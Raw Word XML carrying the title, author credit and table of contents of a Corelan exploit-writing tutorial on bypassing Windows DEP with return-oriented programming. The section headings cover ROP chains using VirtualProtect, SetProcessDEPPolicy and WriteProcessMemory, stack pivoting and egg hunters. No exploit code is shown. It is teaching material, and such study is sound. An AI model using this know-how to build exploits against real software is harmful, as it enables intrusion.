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14.png" ContentType="image/png"/>
  <Override PartName="/word/media/image2.png" ContentType="image/png"/>
  <Override PartName="/word/media/image69.png" ContentType="image/png"/>
  <Override PartName="/word/media/image32.png" ContentType="image/png"/>
  <Override PartName="/word/media/image25.png" ContentType="image/png"/>
  <Override PartName="/word/media/image62.png" ContentType="image/png"/>
  <Override PartName="/word/media/image75.png" ContentType="image/png"/>
  <Override PartName="/word/media/image63.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26.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left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s[TM] Cube</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Published | </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="171450" cy="1714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1450" cy="171450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">By </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Corelan Team (corelanc0d3r)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "introduction"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "hwdep"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Hardware DEP in the Win32 world</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "buildingblocks"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Bypassing DEP – Building blocks</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"options"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>What are our options ?</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"thegadget"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>The gadget</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"functioncalls"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Windows function calls to bypass DEP</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"weapon"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Choose your weapon</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"parameters"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Function parameters &amp; usage tips</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"transportability"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>ROP Exploit transportability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "eiptorop"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>From EIP to ROP</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"directret"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Direct RET</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"sehbased"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>SEH based</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"beforewebegin"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Before we begin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "ropversion"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Direct RET – The ROP version – VirtualProtect()</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"ropnroll"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Time to ROP ‘n ROLL</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"chainingbasics"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>How to build the chain (chaining basics)</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"gadgets"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Finding ROP gadgets</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"call"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>"CALL register" gadgets</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"gotcha"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Gotcha. But how/where exactly do I start ?</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"test"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Test before you start</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"roppery"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Everybody stay cool, this is a roppery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "ropversion2"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Direct RET – ROP Version 2 – NtSetInformationProcess()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "ropversion3"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Direct RET – ROP Version 3 – SetProcessDEPPolicy()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "ropversion4"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Direct RET – ROP Version 4 – ret-to-libc : WinExec()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "ropversionseh"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>SEH Based – The ROP version – WriteProcessMemory()</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"trigger"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Triggering the bug</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"pivot"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Stack pivoting</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"ropnop"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>ROP NOP</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"buildingrop"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Building the ROP chain – WriteProcessMemory()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "egghunters"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Egg hunters</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"patch"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Scenario 1 : patch the egg hunter</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"prepend"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Scenario 2 : prepend the shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "unicode"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "aslr"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>ASLR and DEP ?</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"theory"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>The theory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1414" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "example"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>An example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/" \l "other"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:t>Other literature on DEP / Memory protection bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
        </w:rPr>
